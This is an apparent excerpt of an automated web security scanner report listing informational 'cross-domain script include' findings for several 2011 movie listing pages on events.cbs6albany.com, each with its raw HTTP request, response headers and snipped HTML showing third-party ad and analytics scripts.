Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:50:13 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 58
ETag: "4189f6318e7b101eb2afa6e46fc4f736"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:50:13 GMT; HttpOnly
Content-Length: 41025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.188. http://events.cbs6albany.com/movies/show/272945-black-swan previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/movies/show/272945-black-swan

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /movies/show/272945-black-swan HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:52:04 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 63
ETag: "887c6d16534b4c03430b9c91385c5372"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:52:04 GMT; HttpOnly
Content-Length: 41238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.189. http://events.cbs6albany.com/movies/show/299065-the-kings-speech previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/movies/show/299065-the-kings-speech

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /movies/show/299065-the-kings-speech HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:49:13 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 56
ETag: "92eedb6097f569ba7eaf95f8f4e3377b"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:49:13 GMT; HttpOnly
Content-Length: 40321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.190. http://events.cbs6albany.com/movies/show/324545-true-grit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/movies/show/324545-true-grit

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /movies/show/324545-true-grit HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:49:35 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 72
ETag: "7070a00b9b4c8cf207ab895fc99d71b7"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:49:35 GMT; HttpOnly
Content-Length: 42406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.191. http://events.cbs6albany.com/movies/show/344645-no-strings-attached previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/movies/show/344645-no-strings-attached

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /movies/show/344645-no-strings-attached HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:50:17 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 91
ETag: "89b454a0c7d60ad91ba29817475d17e8"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:50:17 GMT; HttpOnly
Content-Length: 42633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.192. http://events.cbs6albany.com/movies/show/346845-sanctum-3d previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/movies/show/346845-sanctum-3d

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /movies/show/346845-sanctum-3d HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:50:29 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 164
ETag: "e1c13c5d9acfe1ce94e35c26fe8ca0d5"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:50:29 GMT; HttpOnly
Content-Length: 41680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.193. http://events.cbs6albany.com/movies/show/354805-sanctum previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/movies/show/354805-sanctum

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /movies/show/354805-sanctum HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:50:35 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 78
ETag: "05089b5f0e49c16cdb0adcbd3480883a"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:50:35 GMT; HttpOnly
Content-Length: 41611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

